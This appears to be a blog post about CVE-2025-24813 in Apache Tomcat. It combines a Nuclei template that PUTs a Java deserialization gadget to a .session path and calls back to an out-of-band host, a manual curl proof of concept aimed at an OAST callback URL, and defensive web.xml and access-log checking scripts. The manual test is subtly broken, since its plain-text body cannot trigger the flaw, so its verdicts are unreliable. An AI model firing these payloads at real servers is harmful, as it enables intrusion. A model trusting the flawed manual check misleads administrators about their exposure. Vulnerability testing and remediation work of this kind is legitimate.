CVE-2025-24813 PoC: Apache Tomcat Path Equivalence RCE – Risks, Nuclei Check, and RequestBin Test

CVE-2025-24813 PoC exposes Apache Tomcat to RCE. Test with Nuclei YAML or RequestBin, fix with our guide. Protect your apps from this exploit now!

1. Introduction: A Critical Apache Tomcat PoC

Apache Tomcat faces a high-severity threat with CVE-2025-24813, a path equivalence vulnerability leading to remote code execution (RCE). Discovered in 2025, this flaw in the Default Servlet is a goldmine for attackers—and a headache for developers. In this post, we’ll explore the risks, share a PoC YAML rule, and show you how to test it with Nuclei and RequestBin.

CVE-2025-24813 PoC puts your Tomcat apps at risk

2. What is CVE-2025-24813?

CVE-2025-24813 is a path equivalence bug: a filename with an internal dot (e.g., file.Name) is resolved differently by Tomcat’s Default Servlet than by the rest of the server. If the Default Servlet allows writes, attackers can:

  • Execute Code Remotely: Upload malicious payloads for RCE.
  • Steal Data: Expose sensitive files.
  • Inject Malware: Add harmful content to uploads.

With a CVSS 3.1 score of 5.5 (AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L), the Nuclei template nevertheless rates it "high" severity. It’s network-accessible, low-complexity, and a prime target for PoC exploits. Check Scrapco’s analysis for a deep dive.
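Everything that follows hinges on the Default Servlet accepting writes, so before scanning anything it is worth auditing web.xml for that setting. The script below is an added example, not code from the original post or the Nuclei project; it parses a constructed web.xml fragment and reports the two Default Servlet init-params that matter here: readonly (Tomcat’s default is true; the page’s "write access enabled" precondition means it has been set to false) and allowPartialPut (not named on the page, but it is the documented Default Servlet parameter that governs the Content-Range PUT the PoC sends). It also mirrors the way Tomcat parses readonly: anything other than the literal true, once the param is present, turns writes on.

```python
import xml.etree.ElementTree as ET
DEFAULT_SERVLET = "org.apache.catalina.servlets.DefaultServlet"

# Constructed web.xml fragment (not from any real deployment): the Default
# Servlet has been switched to writable, the precondition CVE-2025-24813 needs.
SAMPLE_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
  </servlet>
</web-app>"""

def _local(tag):  # strip the XML namespace so tags compare as plain names
    return tag.rsplit("}", 1)[-1]

def default_servlet_params(web_xml):
    """Collect init-params (name -> value) of every DefaultServlet declaration."""
    params = {}
    for servlet in ET.fromstring(web_xml).iter():
        if _local(servlet.tag) != "servlet":
            continue
        classes = [c.text.strip() for c in servlet if _local(c.tag) == "servlet-class" and c.text]
        if DEFAULT_SERVLET not in classes:
            continue
        for init in servlet:
            if _local(init.tag) != "init-param":
                continue
            fields = {_local(f.tag): (f.text or "").strip() for f in init}
            if "param-name" in fields:
                params[fields["param-name"]] = fields.get("param-value", "")
    return params

def is_writable(web_xml):
    """readonly is parsed with Java's Boolean.parseBoolean: once set, only the
    literal 'true' (any case) keeps writes off; unset means Tomcat's default, true."""
    readonly = default_servlet_params(web_xml).get("readonly")
    return readonly is not None and readonly.lower() != "true"

def findings(web_xml):
    """Human-readable findings for the CVE-2025-24813 preconditions in this web.xml."""
    params = default_servlet_params(web_xml)
    out = []
    if is_writable(web_xml):
        out.append("DefaultServlet accepts PUT (readonly=%r); set readonly to true" % params.get("readonly"))
        # allowPartialPut defaults to true; it governs the Content-Range PUT the PoC sends
        if params.get("allowPartialPut", "true").lower() != "false":
            out.append("partial PUT enabled (allowPartialPut not false); disable until patched")
    return out
```

Run findings() over each deployed web.xml (and Tomcat’s global conf/web.xml, which declares the Default Servlet for every webapp); an empty list means the write precondition is absent.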

3. Why Developers Should Worry

Running a Tomcat release older than 11.0.3, 10.1.35, or 9.0.98? This vulnerability could:

  • Compromise your app, leaking user data.
  • Let attackers run commands, turning servers into attack hubs.
  • Trigger costly breaches or ransomware.

The Nuclei PoC below proves how easy it is to test—and exploit.

CVE-2025-24813 PoC could let hackers hijack your Tomcat server

4. Testing CVE-2025-24813: Nuclei PoC and RequestBin

You can verify this vulnerability with two methods: Nuclei (using the YAML rule) or RequestBin (manual PoC). Here’s how.

Method 1: Nuclei PoC Check

Nuclei is a fast, open-source vulnerability scanner. Use this YAML rule to detect CVE-2025-24813:

More details at https://nuclei-templates.com/vulnerability/http/cves/2025/cve-2025-24813/

id: CVE-2025-24813

info:
  name: Apache Tomcat Path Equivalence - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Path Equivalence- 'file.Name' (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat.
  remediation: |
    Users are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.98, which fixes the issue.
  reference:
    - https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html
    - https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq
    - http://www.openwall.com/lists/oss-security/2025/03/10/5
    - https://nvd.nist.gov/vuln/detail/CVE-2025-24813
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L
    cvss-score: 5.5
    cve-id: CVE-2025-24813
    cwe-id: CWE-502
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2025,apache,tomcat,rce,intrusive

variables:
  filename: "{{randbase(6)}}"

http:
  - raw:
      - |
        PUT /{{filename}}.session HTTP/1.1
        Host: {{Hostname}}
        Content-range: bytes 0-452/457

        {{generate_java_gadget("dns", "http://{{interactsh-url}}", "raw")}}
      - |
        PUT /{{filename}}.session HTTP/1.1
        Host: {{Hostname}}
        Content-range: bytes 0-452/457

        {{generate_java_gadget("dns", "http://{{interactsh-url}}", "raw")}}
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
      - type: status
        status:
          - 204
          - 201

Use Nuclei

  1. Install Nuclei: Download from GitHub and install (e.g., go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest).
  2. Save the YAML: Copy the rule into a file, e.g., cve-2025-24813.yaml.
  3. Run the Scan:
nuclei -u http://your-tomcat-server.com -t cve-2025-24813.yaml
    • -u: Target URL.
    • -t: Template file.
    • Interactsh: because the template references {{interactsh-url}}, Nuclei enables its built-in Interactsh service for the DNS callback automatically; no extra flag is needed (-no-interactsh turns it off).
  4. Check Results: If Nuclei reports a match (DNS callback + 201/204 status), your server is vulnerable. No match? You’re likely safe, but confirm your version.

Running Nuclei to test CVE-2025-24813 PoC on your Tomcat server.

Method 2: RequestBin Manual PoC

RequestBin offers a simpler, manual test:

  1. Get a callback URL: Navigate to RequestBin.net, click the "Get RequestBin" button, and copy the unique URL provided (e.g., https://<id>.oast.pro).
  2. Craft the PoC Request:
PUT /test123.session HTTP/1.1
Host: your-tomcat-server.com
Content-range: bytes 0-452/457

dns://<id>.oast.pro
  3. Send It: Use curl, and repeat the request twice:
curl -X PUT -H "Host: your-tomcat-server.com" -H "Content-range: bytes 0-452/457" -d "dns://<id>.oast.pro" http://your-tomcat-server.com/test123.session
  4. Verify:
    • RequestBin logs the request and curl shows 201/204? Vulnerable.
    • No log, or an error (e.g., 403)? Likely safe.

5. Fixing CVE-2025-24813

If your PoC tests confirm vulnerability:

  • Upgrade Now: Install Tomcat 11.0.3, 10.1.35, or 9.0.98 (Apache thread).
  • Restrict Write Access: The Default Servlet is read-only unless its readonly init-param has been set to false in web.xml; remove that override (or set it back to true) if upgrading isn’t immediate.
  • Monitor Traffic: Look for unusual PUT requests to .session paths, especially ones carrying a Content-Range header and answered with 201/204.
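To make the monitoring step concrete, here is an added example (not from the original post) that runs the "PUT to a .session path, accepted with 201/204" rule over Tomcat access-log lines. It assumes the AccessLogValve "common" pattern (%h %l %u %t "%r" %s %b); the log lines are constructed for the example, and the 201/204 condition is the same success signal the PoC above keys on, so rejected writes (403) are deliberately not flagged.

```python
import re
from collections import Counter

# Constructed Tomcat access-log lines in the default "common" pattern
# (%h %l %u %t "%r" %s %b); these are not from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Mar/2025:10:15:02 +0000] "PUT /abc123.session HTTP/1.1" 201 -
10.0.0.5 - - [11/Mar/2025:10:15:02 +0000] "PUT /abc123.session HTTP/1.1" 204 -
10.0.0.7 - - [11/Mar/2025:10:15:05 +0000] "GET /index.html HTTP/1.1" 200 1043
10.0.0.9 - - [11/Mar/2025:10:16:00 +0000] "PUT /upload/report.pdf HTTP/1.1" 403 -
10.0.0.9 - - [11/Mar/2025:10:16:07 +0000] "PUT /docs/notes.SESSION HTTP/1.1" 201 -
"""

LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def parse(line):
    """Split one common-format line into fields; None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def is_suspicious(entry):
    """A PUT of a *.session resource that the server accepted (201/204): the
    write succeeded, which is exactly the signal the PoC above looks for."""
    if entry["method"] != "PUT":
        return False
    path = entry["path"].split("?", 1)[0].lower()  # ignore query string, case
    return path.endswith(".session") and entry["status"] in ("201", "204")

def scan(log_text):
    """Return the suspicious entries plus a count per source host."""
    hits = [e for e in map(parse, log_text.splitlines()) if e and is_suspicious(e)]
    return hits, Counter(e["host"] for e in hits)

if __name__ == "__main__":
    hits, by_host = scan(SAMPLE_LOG)
    for e in hits:
        print(f'{e["time"]} {e["host"]} PUT {e["path"]} -> {e["status"]}')
    print("per host:", dict(by_host))
```

Feed it your real access log with scan(open(path).read()); the two hits from 10.0.0.5 mirror the PoC’s "repeat the request twice" pattern.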

6. Conclusion

CVE-2025-24813 is a potent RCE risk for Tomcat users. With our Nuclei PoC and RequestBin guide, you can test your servers fast. Upgrade, secure, and stay proactive—your apps deserve it!